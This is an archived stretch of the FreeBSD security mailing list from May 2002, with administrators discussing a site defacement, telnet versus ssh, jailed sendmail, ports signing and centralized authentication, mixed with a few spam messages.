22:23:46 -0700 (PDT) Received: from blossom.cjclark.org ([12.234.91.48]) by rwcrmhc51.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020507052345.XHLE9799.rwcrmhc51.attbi.com@blossom.cjclark.org>; Tue, 7 May 2002 05:23:45 +0000 Received: (from cjc@localhost) by blossom.cjclark.org (8.11.6/8.11.6) id g475NjF89639; Mon, 6 May 2002 22:23:45 -0700 (PDT) (envelope-from cjc) Date: Mon, 6 May 2002 22:23:44 -0700 From: "Crist J. Clark" To: SolarfluX Cc: security@FreeBSD.ORG Subject: Re: cvsup/install over ssh? Message-ID: <20020506222344.E89339@blossom.cjclark.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from solarflux@ziplip.com on Mon, May 06, 2002 at 02:05:48PM -0700 X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, May 06, 2002 at 02:05:48PM -0700, SolarfluX wrote: > Why doesn't cvsup have the option to be encrypted via ssh like anoncvs does? > > How about an option to install over an encrypted connection? > > Would anyone consider implementing either of these suggestions? There's built in SOCKS support. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 22:24:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from rwcrmhc54.attbi.com (rwcrmhc54.attbi.com [216.148.227.87]) by hub.freebsd.org (Postfix) with ESMTP id 4515137B408 for ; Mon, 6 May 2002 22:24:39 -0700 (PDT) Received: from blossom.cjclark.org ([12.234.91.48]) by rwcrmhc54.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020507052438.VLIH2627.rwcrmhc54.attbi.com@blossom.cjclark.org>; Tue, 7 May 2002 05:24:38 +0000 Received: (from cjc@localhost) by blossom.cjclark.org (8.11.6/8.11.6) id g475Ob089649; Mon, 6 May 2002 22:24:37 -0700 (PDT) (envelope-from cjc) Date: Mon, 6 May 2002 22:24:37 -0700 From: "Crist J. Clark" To: Sam Drinkard Cc: security@FreeBSD.ORG Subject: Re: Woot project Message-ID: <20020506222437.F89339@blossom.cjclark.org> References: <3CD72712.37CB5750@vortex.wa4phy.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3CD72712.37CB5750@vortex.wa4phy.net>; from sam@wa4phy.net on Mon, May 06, 2002 at 09:00:02PM -0400 X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, May 06, 2002 at 09:00:02PM -0400, Sam Drinkard wrote: > Hello list, > > I just discovered I have been hacked on my main webpage from > apparently the Woot project kiddies. I assume, right after the attack, > I received an email from some outfit called alldas.org. My problem is > this. According to what I have read about the woot project, access is > gained by portscanning for the presence of SSH-1. I don't have SSH-1 or > 2 active at the moment, so I'm wondering how access was gained. Have > searched all the log files for unusual activity, and nothing is apparent > so far. The message left at the bottom of my main page was: > > FreeBSD vortex.wa4phy.net 4.5-STABLE sexcii... - [sYn] of woot-project > > Aside from the SSH-1 vulunerabilities, is there any other known > entry points associated with this cracker group? CGI bugs. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 23:20:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id AE0CC37B406 for ; Mon, 6 May 2002 23:20:36 -0700 (PDT) Received: 8.12.2-(Neptune) Received: 8.12.2-(Venus) Received: 8.12.2-(Neptune) From: "Nielsen" To: References: <20020506094455.GA9926@kaktusas.org> Subject: Re: ipfw MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020507062036.AE0CC37B406@hub.freebsd.org> Date: Mon, 6 May 2002 23:20:36 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hmmm, interesting. I wonder how stable it is. What we use in production is a script that every minute resolves MAC addresses to ips and refreshes the rules. Yeah, it's a little hokey but it works like a charm. See http://memberwebs.com/nielsen for a tool that does the resolving. Nate > http://www.bsdshell.net/hut_ethfw.html > > Paulius To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 23:22:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id A75CE37B400 for ; Mon, 6 May 2002 23:22:32 -0700 (PDT) Received: 8.12.2-(Neptune) Received: 8.12.2-(Venus) Received: 8.12.2-(Neptune) From: "Nielsen" To: References: Subject: Re: jails and sendmail MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020507062232.A75CE37B400@hub.freebsd.org> Date: Mon, 6 May 2002 23:22:32 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > On the host itself, I have in rc.conf: sendmail_enable="NO", instead > of "NONE", to allow cron stuff to get mail out. Good, then it won't interfere with the jails. > I'd like to have sendmail_enable="YES" in each of my jails. Right > now, sendmail doesn't seem to want to start in my jails with ="YES". I guess you aliased the jails ip when starting up? > Is it necessary to tell sendmail inside a jail to listen only on that > jail's IP? If so, how is this done? I'm hoping a line or two in the > .mc file will do it, but I'm new to editing these files. Nope, not when running in a jail. The jail code translates INADDR_ANY to just the jails ip. This is done transparently. > Is there a problem with the localhost sendmail config being shared > around the jails, since localhost really belongs to the host itself > (if I understand localhost correctly)? In a jail "localhost" is also mapped to the jails ip. Again transparently. Do other daemons run and can you access them from outside the jail and/or other systems? Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 23:25:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id E638C37B401 for ; Mon, 6 May 2002 23:25:34 -0700 (PDT) Received: 8.12.2-(Neptune) Received: 8.12.2-(Venus) Received: 8.12.2-(Neptune) From: "Nielsen" To: , References: <135YGUD5H2YCVJ3JLY3L2CMBQCXYNOQCEADYX2T5@ziplip.com> <200205061347.54915.dowen@pstis.com> Subject: Re: Telnet Exploit MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020507062534.E638C37B401@hub.freebsd.org> Date: Mon, 6 May 2002 23:25:34 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At our site we've implemented a policy of separating "secure" and "insecure" logins. We do this via a PAM module. We use SSH for shell logins exclusively. Using this PAM module we mandate that the same password/login can't be used with insecure (SMTP, FTP etc..) protocols. > So if we are going to do away with telnetd, we should scrap FTP and SMTP > then.. as they are garbage protocols. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 23:40:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabru.pinn.net (kabru.pinn.net [198.252.201.11]) by hub.freebsd.org (Postfix) with ESMTP id 3F16337B40A for ; Mon, 6 May 2002 23:40:23 -0700 (PDT) Received: from matterhorn.pinn.net (matterhorn.pinn.net [198.252.201.8]) by kabru.pinn.net (8.11.3/8.9.1) with ESMTP id g476cFT03420 for ; Tue, 7 May 2002 02:38:15 -0400 (EDT) Received: (from kanedev@localhost) by matterhorn.pinn.net (8.9.3+Sun/8.8.8) id CAA11961; Tue, 7 May 2002 02:44:34 -0400 (EDT) Date: Tue, 7 May 2002 02:44:34 -0400 (EDT) Message-Id: <200205070644.CAA11961@matterhorn.pinn.net> To: security@freebsd.org From: Kane Marie Fine Arts Gallery Reply-To: Kane Marie Fine Arts Gallery Subject: You've Been Added! MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=boundary42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --boundary42 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit This message is to confirm the addition of your email address: security@freebsd.org to the Kane Marie Fine Arts Gallery Subscribe Me mailing list. If you feel you have received this notice in error, please visit the Kane Marie Fine Arts Gallery Subscribe Me mailing list at our website: http://www.kanemarie.com to remove yourself automatically, or click the link below: http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?r=1&l=1&e=security=:freebsd.org Thank you, Kane Marie Fine Arts Gallery --boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 0:12:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from web21503.mail.yahoo.com (web21503.mail.yahoo.com [66.163.169.14]) by hub.freebsd.org (Postfix) with SMTP id 0E54137B40A for ; Tue, 7 May 2002 00:12:27 -0700 (PDT) Message-ID: <20020507071226.31885.qmail@web21503.mail.yahoo.com> Received: from [204.120.48.3] by web21503.mail.yahoo.com via HTTP; Tue, 07 May 2002 00:12:26 PDT Date: Tue, 7 May 2002 00:12:26 -0700 (PDT) From: nat sheiriman To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="0-1231831488-1020755546=:29731" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --0-1231831488-1020755546=:29731 Content-Type: multipart/alternative; boundary="0-2136099446-1020755546=:29731" --0-2136099446-1020755546=:29731 Content-Type: text/plain; charset=us-ascii --------------------------------- Do You Yahoo!? Yahoo! Health - your guide to health and wellness --0-2136099446-1020755546=:29731 Content-Type: text/html; charset=us-ascii


Do You Yahoo!?
Yahoo! Health - your guide to health and wellness --0-2136099446-1020755546=:29731-- --0-1231831488-1020755546=:29731 Content-Type: image/pjpeg; name="freebsd.org_Is_His-God's-012101.jpg" Content-Transfer-Encoding: base64 Content-Description: freebsd.org_Is_His-God's-012101.jpg Content-Disposition: inline; filename="freebsd.org_Is_His-God's-012101.jpg" /9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsL DBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/ 2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQABADASIAAhEBAxEB/8QA HwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUF BAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkK FhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1 dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXG x8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEB AQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAEC AxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRom JygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOE hYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU 1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDRjso7SzLa PHNbo9q8uGiRSMhFU4I7qoOcYbljyQa5Pw6b6w+02tldxyTyRxH7HIqEy/Ph FXJBBGWOUyAVAJ5zXVQw3tn4lSOaciCSCZZ1MokzL5m7eD1xhs47ZA64zwPi r7NNeR3PmyRxTB0KMApVgfQHOcnOenoTXBhoVHOWmjPUxU6apx11X6n/2Q== --0-1231831488-1020755546=:29731-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 0:25:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from borja.sarenet.es (borja.sarenet.es [192.148.167.77]) by hub.freebsd.org (Postfix) with ESMTP id 01D9F37B409 for ; Tue, 7 May 2002 00:23:48 -0700 (PDT) Received: from there (localhost [127.0.0.1]) by borja.sarenet.es (8.12.3/8.12.3) with SMTP id g477NjR3025099; Tue, 7 May 2002 09:23:45 +0200 (CEST) (envelope-from borjam@sarenet.es) Message-Id: <200205070723.g477NjR3025099@borja.sarenet.es> Content-Type: text/plain; charset="iso-8859-1" From: Borja Marcos Organization: Sarenet S.A. To: solarflux@ziplip.com Subject: Re: Telnet Exploit Date: Tue, 7 May 2002 09:23:44 +0200 X-Mailer: KMail [version 1.3.2] References: In-Reply-To: Cc: security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tuesday 07 May 2002 01:22, you wrote: > Are you for real? Have you ever sniffed a connection between two machi= nes =09Sure! > using ssldump? When looking at a telnet or ftp connection, it shows > everything, clear as day. =09It is obvious that ssh has many benefits. It encrypts the connection, = and=20 you can use public keys to authenticate both parties. I am not silly. > As long as OpenSSH exploits are fixed in a timely fashion, I consider s= shd > to be MUCH more secure than telnetd. The zlib bug argument is pretty w= eak. =09I don't think it is weak. Software complexity is a serious danger. I w= ould=20 prefer a simpler ssh service without frills, subject to a design process = with=20 a strong focus on security. Do you think all the software used by OpenSSH= (or=20 other ssh implementations) has been thoroughly audited? =09Hey, I use ssh years ago, and I always authenticate with public keys. = It is=20 really useful, but I am worried with the current trends with software=20 complexity and reuse. It can lead to security problems. =09Borja. --=20 __________________________________________________________________ Borja Marcos * borjam@sarenet.es Responsable de seguridad * Tel: +34 944209470 SARENET S.A. - * Fax: +34 944209465 Parque Tecnologico, 103 * PGP KeyID: 0x50B24B8C 48170 - Zamudio (Bizkaia) SPAIN * __________________________________________________________________ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 2:40:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from frigg.inter.net.il (frigg.inter.net.il [192.114.186.16]) by hub.freebsd.org (Postfix) with ESMTP id B81D437B406 for ; Tue, 7 May 2002 02:40:17 -0700 (PDT) Received: from noused ([80.230.140.101]) by frigg.inter.net.il (Mirapoint Messaging Server MOS 3.1.0.54-GA) with SMTP id BKG08711; Tue, 7 May 2002 12:37:06 +0300 (IDT) Message-ID: <001401c1f5b2$d648bec0$658ce650@noused> From: "Retal" To: Subject: I can't see this damn message anymore Date: Tue, 7 May 2002 12:34:57 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0011_01C1F5C3.98E4BDC0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0011_01C1F5C3.98E4BDC0 Content-Type: text/plain; charset="windows-1255" Content-Transfer-Encoding: quoted-printable Why i'm getting 100 messages like: you have been added you have been = removed.. 100 times? 20 messages a day, damn it bothers.... Retal (retal@retal.co.il) ------=_NextPart_000_0011_01C1F5C3.98E4BDC0 Content-Type: text/html; charset="windows-1255" Content-Transfer-Encoding: quoted-printable
Why i'm getting 100 messages like: you = have been=20 added you have been removed.. 100 times? 20 messages a day, damn it=20 bothers....
 
Retal (retal@retal.co.il) ------=_NextPart_000_0011_01C1F5C3.98E4BDC0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 5:48:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id 43CBF37B433 for ; Tue, 7 May 2002 05:48:12 -0700 (PDT) Received: (qmail 19798 invoked by uid 1000); 7 May 2002 12:48:33 -0000 Date: Tue, 7 May 2002 14:48:33 +0200 From: "Karsten W. Rohrbach" To: SolarfluX Cc: security@freebsd.org Subject: ports signing, Was: cvsup/install over ssh? Message-ID: <20020507144833.L15411@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , SolarfluX , security@freebsd.org References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="aiCxlS1GuupXjEh3" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from solarflux@ziplip.com on Mon, May 06, 2002 at 02:05:48PM -0700 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer X-Work-URL: http://www.ngenn.net/ X-Work-Address: nGENn GmbH, Schloss Kransberg, D-61250 Usingen-Kransberg, Germany X-Work-Phone: +49-6081-682-304 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --aiCxlS1GuupXjEh3 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable SolarfluX(solarflux@ziplip.com)@2002.05.06 14:05:48 +0000: > Why doesn't cvsup have the option to be encrypted via ssh like anoncvs do= es? ipsec(4) > How about an option to install over an encrypted connection? setkey(8) > Would anyone consider implementing either of these suggestions? main question: what problem do you want to solve with it? on a high-volume download site i wouldn't even think about implementing payload signing/encryption on the network layer. the cost of cpu cycles in such an environment is much too high. as hardware gets faster and cheaper, it might become reality. perhaps someday, there will be tokens and configuration info available for ftp.freebsd.org, but what about the mirrors? trust, authenticity, integrity must be maintained throughout the infrastructure. this is not possible through only encryption on the network layer. in ports' distfiles, checksums are used already, but only to have control over source archive integrity, not really authenticity (this would imply the ports tree itself being signed, or elements of it, using some PKCS variant). what i could imagine is a "checksig" target in the ports tree, but this has the following implications: - one additional .sig/.asc file per port - gnupg must be installed to be able to check, first (but this could already be a tampered version, that gives an "OK" everytime) - each port maintainer must have a private key and gnupg to sign his port(s) - a publicly available web of trust containing cross-signed pubkeys of the maintainers needs to be made available (and managed) - the maintainer's mailbox will most certainly fill up with "port is not signed" or whatelse obscure messages when the system is freshly deployed thinking about it, it looks like worth thinking about it a little further. opinions? flames? regards, /k --=20 > The life uncaffeinated is not worth living. --Michael Han WebMonster Community Project -- Next Generation Networks GmbH -- All on BSD http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.n= et/ GnuPG: 0xDEC948A6 D/E BF11 83E8 84A1 F996 68B4 A113 B393 6BF4 DEC9 48A6 REVOKED: 0x2964BF46 D/E 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46 REVOKED: 0x4C44DA59 RSA F9 A0 DF 91 74 07 6A 1C 5F 0B E0 6B 4D CD 8C 44 My mail is GnuPG signed -- Unsigned ones are bogus -- http://www.gnupg.org/ Please do not remove my address from To: and Cc: fields in mailing lists. 1= 0x --aiCxlS1GuupXjEh3 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Comment: For info see http://www.gnupg.org iD8DBQE8180gs5Nr9N7JSKYRAieWAKCs0Aby8JrKX4Wu056rU5LjqE/lvgCfb3iO I0koDrVu76V+zfKL1AZJ5r4= =PIbP -----END PGP SIGNATURE----- --aiCxlS1GuupXjEh3-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 7: 8:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from dc.cis.okstate.edu (dc.cis.okstate.edu [139.78.100.219]) by hub.freebsd.org (Postfix) with ESMTP id 5D2B137B412 for ; Tue, 7 May 2002 07:08:35 -0700 (PDT) Received: from dc.cis.okstate.edu (localhost [127.0.0.1]) by dc.cis.okstate.edu (8.11.6/8.11.3) with ESMTP id g47E8Vl29936 for ; Tue, 7 May 2002 09:08:34 -0500 (CDT) (envelope-from martin@dc.cis.okstate.edu) Message-Id: <200205071408.g47E8Vl29936@dc.cis.okstate.edu> To: freebsd-security@FreeBSD.ORG Subject: I am My Own Worst Enemy Regarding Denial of Service! Date: Tue, 07 May 2002 09:08:31 -0500 From: Martin McCormick Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I set up our syslog.conf on a FreeBSD system to notify all of us when the network equipment we monitor sends a critical syslog message. This works perfectly and we get the messages on all logged-in TTY's. The system breaks down if one of our pieces of gear goes in to a failure mode in which it sends a continuous or more or less continuous stream of messages to everybody with such frequency that the window or screen is quickly filled. Is there any way to define a login in such a way as to escape the bombardment? The idea is to define one terminal with no messages in order to be able to work without interruption on the system in question. Martin McCormick WB5AGZ Stillwater, OK OSU Center for Computing and Information Services Network Operations Group To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 7:12:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from rhodium.cix.co.uk (rhodium.cix.co.uk [194.153.21.68]) by hub.freebsd.org (Postfix) with ESMTP id 7841E37B400; Tue, 7 May 2002 07:11:49 -0700 (PDT) Received: from ctek-uk.com (126.234.35.212.in-addr.arpa.ip-pool.cix.co.uk [212.35.234.126]) by rhodium.cix.co.uk (8.9.3+Sun/8.9.3) with SMTP id JAA03618; Tue, 7 May 2002 09:06:05 +0100 (BST) X-Envelope-From: alex@ctek-uk.com Message-Id: <200205070806.JAA03618@rhodium.cix.co.uk> From: "Alex" To: Subject: PC for sale Mime-Version: 1.0 Content-Type: text/plain; charset="ISO-8859-1" Date: Tue, 7 May 2002 09:06:37 +0100 Reply-To: "Alex" Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, We have a limited number of IBM Desktop PC's for sale: Pentium 166 MMX, 2.5 Gb Hard Drive, 64 Mb RAM, 3.5" Floppy, 52x CD-Rom drive, 15" SVGA Monitor, Keyboard and Mouse, with Windows 98 and Office XP PRO pre-installed, all for £200. For more info, visit us at www.ctek-uk.com/pc, email us at info@ctek-uk.com or call 0870 742 7816. Thanks, Paul To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 7:37:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from koibito.iisc.com (koibito.iisc.com [198.5.5.5]) by hub.freebsd.org (Postfix) with ESMTP id E8C1637B40B for ; Tue, 7 May 2002 07:37:19 -0700 (PDT) Received: from koibito.iisc.com ([127.0.0.1]) by koibito.iisc.com (8.9.0/8.9.0) with ESMTP id KAA23748; Tue, 7 May 2002 10:36:59 -0400 (EDT) Message-Id: <200205071436.KAA23748@koibito.iisc.com> To: sam@wa4phy.net, security@FreeBSD.ORG Subject: Re: Woot project In-Reply-To: Your message of "Mon, 06 May 2002 21:00:02 EDT." <3CD72712.37CB5750@vortex.wa4phy.net> Date: Tue, 07 May 2002 10:36:59 -0400 From: "Charles M. Richmond" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > I don't have SSH-1 or 2 active at the moment, That you know of... If your machine has been hacked previously, then that hacker probably left an sshd running as part of his rootkit. It may not be named sshd of course and it does have a back door. Or as you ask below, there is another vector of attack. I had a FreeBSD box hacked and until I figure out how it was done, I can't put it back in the network. Hmmm... maybe I'll put WK2 on it. )-: > so I'm wondering how access was gained. Have > searched all the log files for unusual activity, and nothing is apparent > so far. The message left at the bottom of my main page was: > > FreeBSD vortex.wa4phy.net 4.5-STABLE sexcii... - [sYn] of woot-project > > Aside from the SSH-1 vulunerabilities, is there any other known > entry points associated with this cracker group? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 8:49:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from ra.upan.org (ra.upan.org [204.107.76.19]) by hub.freebsd.org (Postfix) with ESMTP id A6E7F37B400 for ; Tue, 7 May 2002 08:49:10 -0700 (PDT) Received: from ocsinternet.com ([10.0.0.140]) by ra.upan.org (8.11.6/8.11.6) with ESMTP id g47Fm5V42531; Tue, 7 May 2002 11:48:06 -0400 (EDT) (envelope-from mikel@ocsinternet.com) Message-ID: <3CD8058D.4090706@ocsinternet.com> Date: Tue, 07 May 2002 11:49:17 -0500 From: Mikel King User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.4.1) Gecko/20020314 Netscape6/6.2.2 X-Accept-Language: en-us MIME-Version: 1.0 To: "Douglas K. Rand" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Centralized authentication References: <874riov1et.wl@delta.meridian-enviro.com> <87d6x8smle.fsf@delta.meridian-enviro.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Douglas, I know this was an old post, but sometimes I can't keep up with the world...;) In any event... I do understand what it is you require, as I have been suffering from the same dilema. I tried ldap and wasn't happy with it, probably due to something I didn't setup correctly but that asside. I've used rsync via ssh, and it was time consuming... I began looking for something else. What I decided, was that I needed something simple: currently I'm playing around with pam_mysql, because I can use mysql's builtins to synchronize the db's, and as thing develop I can strap a webfront end on the db and manage the whole thing. Well the later part is the goal, but as a result of time constraints we're not there quite yet... Anyway that's what I came up with, and as time permits I've been trying to get there... I am curious to know what you've found... Cheers, mikel Douglas K. Rand wrote: >First, I'm sorry I disappeared for a few days, this has been a great >discussion. > >Jacques Vidrine is right: the subject doesn't really describe what I >need. In addition to authentication I also want centralized >distribution of /etc/passwd (uid, gid, home, shell) and /etc/group. > >A few people suggested NIS+. Virtually all of our boxes are FreeBSD, >and the ones that aren't FreeBSD we wish they were. :) Can I run an >NIS+ server on FreeBSD? I poked around the handbook and the searches >for FreeBSD and NIS+ didn't return anything that lead me to believe >that NIS+ support was ready, or even there. But it also sounds like I >should pick NIS over NIS+ unless I /really/ need the NIS+ features. > >I think Pieter Danhieux was the first to suggest using NIS for >everything EXCEPT the encrypted passwords, an approach that I had >never considered before. After a little thought on this I find myself >liking this idea. I could use NIS to distribute the (relatively) >unsensitive information, everything in /etc/passwd and /etc/group, and >also the login class, password change time, and account expiration >time from /etc/master.passwd, setting the encrypted password to "*". > >Then I can use PAM modules for authentication. (What my subject said >but not quite what I meant. :)) Here are the PAM modules that I know >about and that I'd consider: > > o pam_radius > o pam_ldap > o pam_ssh > >I'm going to group pam_radius and pam_ldap together simply because I >don't know very much about either server. My very limited >understanding leads me to believe that a Radius server is easier to >setup and get working than an LDAP server. I also understand that >unless you go through a fair amount of pain, secure communications >between the client and the LDAP server is difficult. I have a few >questions about these PAM modules: > > o How secure is the client-server communications with a Radius > server? > > o Can a user on a client change the password either the Radius or > LDAP server, either with the passwd command or some other command? > >What about the pam_ssh module? Is it reasonable to allow users to >authenticate off their own SSH key, or should the authentication be >done via some other mechanism and then just use the session part of 